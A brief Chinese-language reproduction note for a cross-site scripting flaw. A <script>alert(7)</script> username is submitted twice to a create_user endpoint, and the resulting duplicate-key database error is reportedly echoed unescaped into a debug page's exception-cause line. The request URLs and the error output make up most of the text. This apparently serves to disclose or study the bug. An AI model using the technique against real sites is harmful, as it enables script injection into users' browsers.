1.創建個用戶:ip:8000/create_user/?username=<script>alert(7)</script>
顯示用戶已創建。
2.觸發漏洞,再次訪問ip:8000/create_user/?username=<script>alert(7)</script>
3.觸發異常:
duplicate key value violates unique constraint "xss_user_username_key"
DETAIL: Key (username)=(<script>alert(7)</script>) already exists.4.這個異常被拼接進The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最後觸發XSS。